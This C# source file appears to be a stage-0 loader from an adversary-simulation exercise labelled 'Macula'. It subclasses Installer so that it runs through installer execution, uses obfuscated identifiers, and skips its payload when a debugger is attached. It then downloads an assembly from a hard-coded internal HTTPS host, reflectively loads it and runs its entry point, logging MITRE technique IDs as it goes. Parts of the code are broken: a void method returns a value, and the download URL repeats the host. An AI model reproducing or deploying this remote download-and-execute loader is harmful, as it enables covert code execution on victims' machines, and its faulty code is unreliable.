using System;
using System.Net;
using System.Reflection;
using System.Configuration.Install;
using System.Collections;
using System.ComponentModel;
using System.IO;

[RunInstaller(true)]
public class kqjmcxd : Installer
{
    const string zkcxmfh = "Macula-Stage0-6927";
    const string qjghwxa = "MAYAH-S4N";
    const string vdnlzje = "7";
    const string aqjvfv = "https://10.0.0.49";
    const string elmfczc = "6927";
    const string yjctmyx = "https://10.0.0.49/stage/6927-7/3";
    const string rtmqwyb = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";
    
    private void kdlxqsm()
    {
        try
        {
            string zbbmfxc = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + vdnlzje;
            string igeykeo = zbbmfxc + "\\macula-simulations.log";
            
            if (!Directory.Exists(zbbmfxc))
                Directory.CreateDirectory(zbbmfxc);
            
            string mvbcuwi = DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss.fff");
            string yjgnpsb = $"[{mvbcuwi}][{qjghwxa}-{zkcxmfh}]: {vdnlzje}-{elmfczc}";
            
            return yjgnpsb;
        }
        catch { return ""; }
    }
    
    private void vlrfspn(string oaiqexy, string jhmryou, string tcgpmr)
    {
        try
        {
            string rjgtahf = kdlxqsm();
            if (string.IsNullOrEmpty(rjgtahf)) return;
            
            string yzhdqim = $"{rjgtahf}-{oaiqexy}|{jhmryou}=[{tcgpmr}]";
            
            string zbbmfxc = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + vdnlzje;
            string igeykeo = zbbmfxc + "\\macula-simulations.log";
            
            File.AppendAllText(igeykeo, yzhdqim + Environment.NewLine);
        }
        catch { }
    }
    
    public override void Install(IDictionary xjnfkep)
    {
        base.Install(xjnfkep);
        
        if (System.Diagnostics.Debugger.IsAttached) return;
        
        try
        {
            vlrfspn("T1105", "Ingress Tool Transfer", "0:");
            
            WebClient wjffcma = new WebClient();
            wjffcma.Headers.Add("User-Agent", rtmqwyb);
            wjffcma.Headers.Add("X-Simulation-ID", elmfczc);
            wjffcma.Headers.Add("X-Endpoint-ID", vdnlzje);
            
            byte[] vhnucgq = wjffcma.DownloadData(aqjvfv + yjctmyx);
            
            vlrfspn("T1105", "Ingress Tool Transfer", "1:");
            
            if (vhnucgq != null && vhnucgq.Length > 0)
            {
                vlrfspn("T1620", "Reflective Code Loading", "0:");
                
                Assembly oqibhzh = Assembly.Load(vhnucgq);
                
                if (oqibhzh != null)
                {
                    MethodInfo vgyfdsa = oqibhzh.EntryPoint;
                    if (vgyfdsa != null)
                    {
                        object yxcbxnu = oqibhzh.CreateInstance(vgyfdsa.Name);
                        vgyfdsa.Invoke(yxcbxnu, new object[] { new string[0] });
                        
                        vlrfspn("T1620", "Reflective Code Loading", "1:");
                    }
                    else vlrfspn("T1620", "Reflective Code Loading", "0:no_entrypoint");
                }
                else vlrfspn("T1620", "Reflective Code Loading", "0:assembly_load_failed");
            }
        }
        catch (WebException pvhsyfe)
        {
            string pnhcbwz = "timeout";
            if (pvhsyfe.Status == WebExceptionStatus.ConnectFailure) pnhcbwz = "connection_refused";
            else if (pvhsyfe.Status == WebExceptionStatus.Timeout) pnhcbwz = "timeout";
            else if (pvhsyfe.Status == WebExceptionStatus.ProtocolError) pnhcbwz = "http_error";
            
            vlrfspn("T1105", "Ingress Tool Transfer", $"0:{pnhcbwz}");
        }
        catch (Exception fmjcuyr)
        {
            vlrfspn("T1105", "Ingress Tool Transfer", $"0:{fmjcuyr.GetType().Name}");
        }
    }
}